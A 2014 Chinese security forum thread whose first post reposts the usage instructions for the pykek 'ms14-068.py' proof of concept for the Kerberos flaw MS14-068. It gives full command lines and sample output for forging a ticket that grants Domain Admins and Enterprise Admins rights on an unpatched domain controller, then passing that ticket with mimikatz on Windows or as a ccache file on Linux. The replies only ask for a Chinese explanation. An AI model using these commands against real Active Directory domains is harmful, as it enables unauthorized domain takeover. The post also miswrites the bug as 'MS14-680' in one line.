90_ 发表于 2014-12-6 09:20:08

MS14-068 privilege escalation PoC

forum:DM_

http://github.com/bidord/pykek

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)

USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS:
    -p <clearPassword>
--rc4 <ntlmHash>
Example usage :

Linux (tested with samba and MIT Kerberos)

root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password:
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0

On Windows
python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

csadsl 发表于 2014-12-6 09:28:10

本地测试一下,但是必须回复:(

C4r1st 发表于 2014-12-6 12:11:53

域内提权,感谢分享。不过,来点中文好不好,小学生看不懂。

super 发表于 2014-12-6 14:23:00

小学生看不懂英文啊

蓝色_ 发表于 2014-12-6 21:04:29

求注释= =

乐生乐道 发表于 2014-12-8 00:46:32

全英文,,,看着有点蛋疼!能不能注解下

Mr.wang 发表于 2014-12-8 09:37:50

小学生看不懂。。。。。

birk 发表于 2014-12-8 20:49:45

看了好半天啊
页: [1]
查看完整版本: MS14-068 privilege escalation PoC